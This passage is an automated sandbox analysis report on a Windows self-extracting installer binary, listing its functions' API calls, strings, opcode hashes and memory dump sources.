                                                                  • String ID: 03A$;!@Install@!UTF-8!$;!@InstallEnd@!
                                                                  • API String ID: 4038993085-2279431206
                                                                  • Opcode ID: 1e5f1ef11ab3d9e84330ff60a8d60345b5fdf25d940142a54a900a3d947b53ea
                                                                  • Instruction ID: 637b7b13a9bcd1d52ea1019587bfa2fb4435f6835f564ae220b3123002230846
                                                                  • Opcode Fuzzy Hash: 1e5f1ef11ab3d9e84330ff60a8d60345b5fdf25d940142a54a900a3d947b53ea
                                                                  • Instruction Fuzzy Hash: CE312D71D0021EEACF05EF92CD429EEBBB4BF44318F10042BE911762E1DB785649DB98
                                                                  Function 0040755F Relevance: 10.6, APIs: 7, Instructions: 63timethreadinjectionCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • EndDialog.USER32(?,00000000), ref: 00407579
                                                                  • KillTimer.USER32(?,00000001), ref: 0040758A
                                                                  • SetTimer.USER32(?,00000001,00000000,00000000), ref: 004075B4
                                                                  • SuspendThread.KERNEL32(0000027C), ref: 004075CD
                                                                  • ResumeThread.KERNEL32(0000027C), ref: 004075EA
                                                                  • EndDialog.USER32(?,00000000), ref: 0040760C
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1760084360.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1760067567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760146775.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760163507.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760190975.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_OdiHmn3pRK.jbxd
                                                                  Similarity
                                                                  • API ID: DialogThreadTimer$KillResumeSuspend
                                                                  • String ID:
                                                                  • API String ID: 4151135813-0
                                                                  • Opcode ID: fa37b7d0569be928e5d0aecc9653dabfd5de706af621d680b5378aa8e85f3b57
                                                                  • Instruction ID: ebb94c5c4675b2e6542c2b2cb7d5652cccd5624f9a00d71f737e39ca63bd9789
                                                                  • Opcode Fuzzy Hash: fa37b7d0569be928e5d0aecc9653dabfd5de706af621d680b5378aa8e85f3b57
                                                                  • Instruction Fuzzy Hash: 9811BF70A08618BBD7212F15EE849E77BBDFB00756B00843AF523A05A0CB39BD00DA1D
                                                                  Function 00404E3F Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 60COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • ??3@YAXPAX@Z.MSVCRT(004177C4,004177C4,004177C4,00000000,00000024,;!@InstallEnd@!,;!@Install@!UTF-8!,00000000,00000000), ref: 00404E85
                                                                    • Part of subcall function 00404343: ??3@YAXPAX@Z.MSVCRT(?,?,?,004177C4,004177C4,?,;!@InstallEnd@!,;!@Install@!UTF-8!,00000000,00000000), ref: 004043B6
                                                                  • ??3@YAXPAX@Z.MSVCRT(004177C4,004177C4,004177C4,00000000,00000024,004177C4,004177C4,00000000,00000024,;!@InstallEnd@!,;!@Install@!UTF-8!,00000000,00000000), ref: 00404EAB
                                                                  • wsprintfA.USER32 ref: 00404EBC
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1760084360.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1760067567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760146775.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760163507.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760190975.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_OdiHmn3pRK.jbxd
                                                                  Similarity
                                                                  • API ID: ??3@$wsprintf
                                                                  • String ID: :Language:%u!$;!@Install@!UTF-8!$;!@InstallEnd@!
                                                                  • API String ID: 2704270482-1550708412
                                                                  • Opcode ID: b3a647dc230e6375ba5304378dede3f86871d19815b7720c308d82744c7d9f3d
                                                                  • Instruction ID: afe26c372a183c0ca4a1b7edc16cb7be903c3e4040aad79e05e22cec791dc9d0
                                                                  • Opcode Fuzzy Hash: b3a647dc230e6375ba5304378dede3f86871d19815b7720c308d82744c7d9f3d
                                                                  • Instruction Fuzzy Hash: D8115E71B00018BBCF00FB95CC42EFE77ADAB84705B10402EBA15E3182DB78AB028799
                                                                  Function 00403880 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 56COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • ??3@YAXPAX@Z.MSVCRT(00417788,00417788,00000000,%%T\,0041350C,00000000,00417788,00407405,?,00000000,00000000,00000000), ref: 004038C6
                                                                  • ??3@YAXPAX@Z.MSVCRT(00417788,00417788,00000000,%%T/,004134FC,00000000,00417788,00000000,%%T\,0041350C,00000000,00417788,00407405,?,00000000,00000000), ref: 00403904
                                                                  • ??3@YAXPAX@Z.MSVCRT(00417788,00417788,00000000,00417788,00417788,00000000,%%T/,004134FC,00000000,00417788,00000000,%%T\,0041350C,00000000,00417788,00407405), ref: 0040392A
                                                                  • ??3@YAXPAX@Z.MSVCRT(00000000,00417788,00417788,00000000,00417788,00417788,00000000,%%T/,004134FC,00000000,00417788,00000000,%%T\,0041350C,00000000,00417788), ref: 00403932
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1760084360.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1760067567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760146775.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760163507.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760190975.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_OdiHmn3pRK.jbxd
                                                                  Similarity
                                                                  • API ID: ??3@
                                                                  • String ID: %%T/$%%T\
                                                                  • API String ID: 613200358-2679640699
                                                                  • Opcode ID: 9eec194740abc4bee078c15c8dc217b66edb47652cee4dab90ed516c3b80c8f9
                                                                  • Instruction ID: 53c9ca64f2466311d4136dbbff57d229d1af9e29f5fa76e56e45344ae10c91f3
                                                                  • Opcode Fuzzy Hash: 9eec194740abc4bee078c15c8dc217b66edb47652cee4dab90ed516c3b80c8f9
                                                                  • Instruction Fuzzy Hash: 5011DD3190410EBACF05FFA1D857CEDBB79AE00708F50806AB511760E1EF79A785DB98
                                                                  Function 0040393B Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 56COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • ??3@YAXPAX@Z.MSVCRT(00414784,00414784,00000000,%%S\,0041350C,00000000,00414784,00407405,?,00000000,00000000,00000000), ref: 00403981
                                                                  • ??3@YAXPAX@Z.MSVCRT(00414784,00414784,00000000,%%S/,004134FC,00000000,00414784,00000000,%%S\,0041350C,00000000,00414784,00407405,?,00000000,00000000), ref: 004039BF
                                                                  • ??3@YAXPAX@Z.MSVCRT(00414784,00414784,00000000,00414784,00414784,00000000,%%S/,004134FC,00000000,00414784,00000000,%%S\,0041350C,00000000,00414784,00407405), ref: 004039E5
                                                                  • ??3@YAXPAX@Z.MSVCRT(00000000,00414784,00414784,00000000,00414784,00414784,00000000,%%S/,004134FC,00000000,00414784,00000000,%%S\,0041350C,00000000,00414784), ref: 004039ED
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1760084360.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1760067567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760146775.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760163507.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760190975.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_OdiHmn3pRK.jbxd
                                                                  Similarity
                                                                  • API ID: ??3@
                                                                  • String ID: %%S/$%%S\
                                                                  • API String ID: 613200358-358529586
                                                                  • Opcode ID: c94d4b60668bfb9eedf3143ce332dc4c41685f87d495a97f985edcc2faf71bca
                                                                  • Instruction ID: c240205f9e12946546b7747d8fd44f392230bc1153c6614d6b8016afa5fd7689
                                                                  • Opcode Fuzzy Hash: c94d4b60668bfb9eedf3143ce332dc4c41685f87d495a97f985edcc2faf71bca
                                                                  • Instruction Fuzzy Hash: 1D11AD3190410EBACF05FFA1D856CEDBB79AE00708F51806AB511760E1EF78A789DB98
                                                                  Function 004039F6 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 56COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • ??3@YAXPAX@Z.MSVCRT(00414784,00414784,00000000,%%M\,0041350C,00000000,00414784,00407405,?,00000000,00000000,00000000), ref: 00403A3C
                                                                  • ??3@YAXPAX@Z.MSVCRT(00414784,00414784,00000000,%%M/,004134FC,00000000,00414784,00000000,%%M\,0041350C,00000000,00414784,00407405,?,00000000,00000000), ref: 00403A7A
                                                                  • ??3@YAXPAX@Z.MSVCRT(00414784,00414784,00000000,00414784,00414784,00000000,%%M/,004134FC,00000000,00414784,00000000,%%M\,0041350C,00000000,00414784,00407405), ref: 00403AA0
                                                                  • ??3@YAXPAX@Z.MSVCRT(00000000,00414784,00414784,00000000,00414784,00414784,00000000,%%M/,004134FC,00000000,00414784,00000000,%%M\,0041350C,00000000,00414784), ref: 00403AA8
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1760084360.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1760067567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760146775.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760163507.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760190975.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_OdiHmn3pRK.jbxd
                                                                  Similarity
                                                                  • API ID: ??3@
                                                                  • String ID: %%M/$%%M\
                                                                  • API String ID: 613200358-4143866494
                                                                  • Opcode ID: 3eb134fca1680c0093703720a533bafa1d2fd801437f3d80c27f205d784cf8f2
                                                                  • Instruction ID: 5f6947e2f47a7d655e02fb84317d9747a35bc7200d49f7273ebe403b31479b31
                                                                  • Opcode Fuzzy Hash: 3eb134fca1680c0093703720a533bafa1d2fd801437f3d80c27f205d784cf8f2
                                                                  • Instruction Fuzzy Hash: C911AD3190410EBACF05FFA1D956CEDBB79AE00708F51806AB511760E1EF78A789DB58
                                                                  Function 0040E456 Relevance: 10.5, APIs: 1, Strings: 6, Instructions: 42COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • _CxxThrowException.MSVCRT(00000000,00414CFC), ref: 0040E4EE
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1760084360.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1760067567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760146775.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760163507.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760190975.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_OdiHmn3pRK.jbxd
                                                                  Similarity
                                                                  • API ID: ExceptionThrow
                                                                  • String ID: $JA$4JA$DJA$TJA$hJA$xJA
                                                                  • API String ID: 432778473-803145960
                                                                  • Opcode ID: 8cab838d89dd1577677f775eaf8cb930bb6d64206a7fe5cceb0cff601651d84b
                                                                  • Instruction ID: 5492ea6659e041f1bcf420c4685f7038b08242b420f8f2c51a6428b2159ddc92
                                                                  • Opcode Fuzzy Hash: 8cab838d89dd1577677f775eaf8cb930bb6d64206a7fe5cceb0cff601651d84b
                                                                  • Instruction Fuzzy Hash: 7211A5F0541B419BC7308F16E544587FBF8AF907587218A1FD0AA9BA51D3F8A1888B9C
                                                                  Function 0040C0DC Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 243COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 0040BA46: ??2@YAPAXI@Z.MSVCRT(0000000C,?,0040C20C,004149B0,00000001,?,?,00000000), ref: 0040BA4B
                                                                  • ??3@YAXPAX@Z.MSVCRT(00000000,004149B0,00000001,?,?,00000000), ref: 0040C20D
                                                                    • Part of subcall function 0040ADC3: ??2@YAPAXI@Z.MSVCRT(?,?,?,?,0040B1B6,00010000), ref: 0040ADD6
                                                                    • Part of subcall function 0040ADC3: memmove.MSVCRT(00000000,?,?,?,?,?,0040B1B6,00010000), ref: 0040ADF0
                                                                    • Part of subcall function 0040ADC3: ??3@YAXPAX@Z.MSVCRT(?,?,?,?,0040B1B6,00010000), ref: 0040AE00
                                                                  • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,004149B0,00000001,?,?,00000000), ref: 0040C245
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1760084360.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1760067567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760146775.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760163507.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760190975.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_OdiHmn3pRK.jbxd
                                                                  Similarity
                                                                  • API ID: ??2@$??3@$memmove
                                                                  • String ID: IA$IA$IA
                                                                  • API String ID: 4294387087-924693538
                                                                  • Opcode ID: 3ef1446a3f9eae3cfdc2853b922aca3bc2f9cc2cd28dfb990552d7283ffc15f1
                                                                  • Instruction ID: 38d37476858cbe2739f158cf8086d9562841ccd83740beefedbf55b6536d6dac
                                                                  • Opcode Fuzzy Hash: 3ef1446a3f9eae3cfdc2853b922aca3bc2f9cc2cd28dfb990552d7283ffc15f1
                                                                  • Instruction Fuzzy Hash: 20B1C1B1900209DFCB54EFAAC8819DEBBB5BF48304F50852EF919A7291DB38A945CF54
                                                                  Function 0040E811 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • _CxxThrowException.MSVCRT(00100EC3,00414CFC), ref: 0040E83C
                                                                  • ??2@YAPAXI@Z.MSVCRT(?,IA,IA,00000000,?,0040E909,00000000,00408769,IA,00402F92,00000000,00000000,004044E9,?,?,?), ref: 0040E864
                                                                  • memcpy.MSVCRT(00000000,?,?,IA,IA,00000000,?,0040E909,00000000,00408769,IA,00402F92,00000000,00000000,004044E9,?), ref: 0040E88D
                                                                  • ??3@YAXPAX@Z.MSVCRT(?,IA,IA,00000000,?,0040E909,00000000,00408769,IA,00402F92,00000000,00000000,004044E9,?,?,?), ref: 0040E898
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1760084360.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1760067567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760146775.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760163507.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760190975.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_OdiHmn3pRK.jbxd
                                                                  Similarity
                                                                  • API ID: ??2@??3@ExceptionThrowmemcpy
                                                                  • String ID: IA
                                                                  • API String ID: 3462485524-3293647318
                                                                  • Opcode ID: 6b78721643db57d5e00a8af36ebe01533f1ba9cf87e040577b2ff72779c9c95d
                                                                  • Instruction ID: e9362666a157510f6fc1816af10740f0f0ab3f4ff6eb75305f8b2a096945a613
                                                                  • Opcode Fuzzy Hash: 6b78721643db57d5e00a8af36ebe01533f1ba9cf87e040577b2ff72779c9c95d
                                                                  • Instruction Fuzzy Hash: 6811E5736003009BCB28AF57D880D6BFBE9AB84354714C83FEA59A7290D779E8954794
                                                                  Function 00401000 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 44stringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1760084360.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1760067567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760146775.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760163507.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760190975.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_OdiHmn3pRK.jbxd
                                                                  Similarity
                                                                  • API ID: wsprintf$ExitProcesslstrcat
                                                                  • String ID: 0x%p
                                                                  • API String ID: 2530384128-1745605757
                                                                  • Opcode ID: beb3389330693802dd4b40a551927b7f0c9c9e0999a7fc1e7fc7f64098bb755c
                                                                  • Instruction ID: 6c9eba3c29ae2a0cc7ccd16f79f39b6d6218d418ab2b897ff95ca6c62132cda7
                                                                  • Opcode Fuzzy Hash: beb3389330693802dd4b40a551927b7f0c9c9e0999a7fc1e7fc7f64098bb755c
                                                                  • Instruction Fuzzy Hash: CF019E7580020CAFDB20AFA0DC45FDA777CBF44305F04486AF945A2081D738F6948FAA
                                                                  Function 00407A3A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 85COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 004071B8: GetSystemMetrics.USER32(0000000B), ref: 004071E0
                                                                    • Part of subcall function 004071B8: GetSystemMetrics.USER32(0000000C), ref: 004071E9
                                                                  • GetSystemMetrics.USER32(00000007), ref: 00407A51
                                                                  • GetSystemMetrics.USER32(00000007), ref: 00407A62
                                                                  • ??3@YAXPAX@Z.MSVCRT(?,000004B8,?,?), ref: 00407B29
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1760084360.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1760067567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760146775.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760163507.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760190975.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_OdiHmn3pRK.jbxd
                                                                  Similarity
                                                                  • API ID: MetricsSystem$??3@
                                                                  • String ID: 100%%
                                                                  • API String ID: 2562992111-568723177
                                                                  • Opcode ID: 8625fd62ee8a1587f51b59dec5492359d41c9a7e7955315cbfbb4a3169dab2fe
                                                                  • Instruction ID: d2e8aa6d75c6757367bbc63d1236441fd7733528c0e5853e38aed7656a5d7d9b
                                                                  • Opcode Fuzzy Hash: 8625fd62ee8a1587f51b59dec5492359d41c9a7e7955315cbfbb4a3169dab2fe
                                                                  • Instruction Fuzzy Hash: 0D31D771A047059FCB24DFA9C9419AEB7F4EF40308B00012EE542A26E1DB78FE44CF99
                                                                  Function 00407998 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • wsprintfW.USER32 ref: 00407A12
                                                                    • Part of subcall function 0040725A: GetDlgItem.USER32(?,?), ref: 00407264
                                                                    • Part of subcall function 0040725A: GetWindowTextLengthW.USER32(00000000), ref: 0040726B
                                                                  • GetDlgItem.USER32(?,000004B3), ref: 004079C6
                                                                    • Part of subcall function 00402D7D: GetWindowTextLengthW.USER32(?), ref: 00402D8E
                                                                    • Part of subcall function 00402D7D: GetWindowTextW.USER32(00402E07,00000000,00000001), ref: 00402DAB
                                                                  • ??3@YAXPAX@Z.MSVCRT(?,00000000), ref: 004079E4
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1760084360.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1760067567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760146775.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760163507.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760190975.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_OdiHmn3pRK.jbxd
                                                                  Similarity
                                                                  • API ID: TextWindow$ItemLength$??3@wsprintf
                                                                  • String ID: (%u%s)
                                                                  • API String ID: 3595513934-2496177969
                                                                  • Opcode ID: 81108d5736a162b6d9564d3eb7a2e93f5e39dd0108d0485d36b03b99dec63073
                                                                  • Instruction ID: 1b031bef2a273fddd3247fbc9e57f9590cc69a100d620b238320e5a3a24b3f72
                                                                  • Opcode Fuzzy Hash: 81108d5736a162b6d9564d3eb7a2e93f5e39dd0108d0485d36b03b99dec63073
                                                                  • Instruction Fuzzy Hash: 1401C8B15042147FDB107B65DC46EAF777CAF44708F10807FF516A21E2DB7CA9448A68
                                                                  Function 004021ED Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 39libraryloaderCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • LoadLibraryA.KERNEL32(kernel32,GetNativeSystemInfo,0000003C,?,?,?,?,?,?,00406130,?,00000000,?,?,?), ref: 0040220A
                                                                  • GetProcAddress.KERNEL32(00000000), ref: 00402211
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1760084360.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1760067567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760146775.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760163507.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760190975.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_OdiHmn3pRK.jbxd
                                                                  Similarity
                                                                  • API ID: AddressLibraryLoadProc
                                                                  • String ID: GetNativeSystemInfo$kernel32
                                                                  • API String ID: 2574300362-3846845290
                                                                  • Opcode ID: dcc7844bde5d914e3d472255d944d602bbefc6ee0fc65a521985863f2fff9548
                                                                  • Instruction ID: b757a3d5c4c17e34abb063926c294d8abaed4bc4edbc3347b9308a3de004b423
                                                                  • Opcode Fuzzy Hash: dcc7844bde5d914e3d472255d944d602bbefc6ee0fc65a521985863f2fff9548
                                                                  • Instruction Fuzzy Hash: 88F0B432E1521495CF20BBF48B0D6EF66E89A19349B1004BBD852F31D0E5FCCE8141EE
                                                                  Function 00402185 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 13libraryloaderCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • LoadLibraryA.KERNEL32(kernel32,Wow64RevertWow64FsRedirection,004061B1,?,?,?), ref: 00402198
                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0040219F
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1760084360.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1760067567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760146775.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760163507.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760190975.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_OdiHmn3pRK.jbxd
                                                                  Similarity
                                                                  • API ID: AddressLibraryLoadProc
                                                                  • String ID: Wow64RevertWow64FsRedirection$kernel32
                                                                  • API String ID: 2574300362-3900151262
                                                                  • Opcode ID: e5c6d40c89fc1f3fb34c79c32c3445fbc861d0d884c7149ba98d4f5b826d618a
                                                                  • Instruction ID: b94e249185ae4a70534d65e1a66e6cdcdba3a47a1e4784fabdbc91f5644b18b3
                                                                  • Opcode Fuzzy Hash: e5c6d40c89fc1f3fb34c79c32c3445fbc861d0d884c7149ba98d4f5b826d618a
                                                                  • Instruction Fuzzy Hash: AFD0C934294201DBDB125FA0EE0E7EA3AB9FB04B0BF458035A920A00F0CBBC9644CA5C
                                                                  Function 004021B9 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • LoadLibraryA.KERNEL32(kernel32,Wow64DisableWow64FsRedirection,0040223A), ref: 004021CA
                                                                  • GetProcAddress.KERNEL32(00000000), ref: 004021D1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1760084360.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1760067567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760146775.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760163507.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760190975.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_OdiHmn3pRK.jbxd
                                                                  Similarity
                                                                  • API ID: AddressLibraryLoadProc
                                                                  • String ID: Wow64DisableWow64FsRedirection$kernel32
                                                                  • API String ID: 2574300362-736604160
                                                                  • Opcode ID: 5a0f418ac3e49e57b967c4010738a21a45af66be6bd625357fa5c872d0fae828
                                                                  • Instruction ID: 817513c890d082da38b6284c2862a66e2f32a8da2897575df7e5c1eb8648f331
                                                                  • Opcode Fuzzy Hash: 5a0f418ac3e49e57b967c4010738a21a45af66be6bd625357fa5c872d0fae828
                                                                  • Instruction Fuzzy Hash: 0DD012342443009BDB515FA09E0D7DA3EB4B705B07F508076A520E11D1CBFCA244C7AC
                                                                  Function 00402A69 Relevance: 6.1, APIs: 4, Instructions: 101COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00000020,?,?,?,?,?,?,?,?,0040507C,?,00000000), ref: 00402B6F
                                                                    • Part of subcall function 0040272E: MultiByteToWideChar.KERNEL32(00000020,00000000,00000024,?,00000000,?,?,00000020,00000024,00000000,00402ACD,?,?,00000000,00000000,00000000), ref: 00402760
                                                                  • ??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,0040507C,?,00000000), ref: 00402ADC
                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,0040507C,?), ref: 00402AF7
                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,0040507C), ref: 00402AFF
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1760084360.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
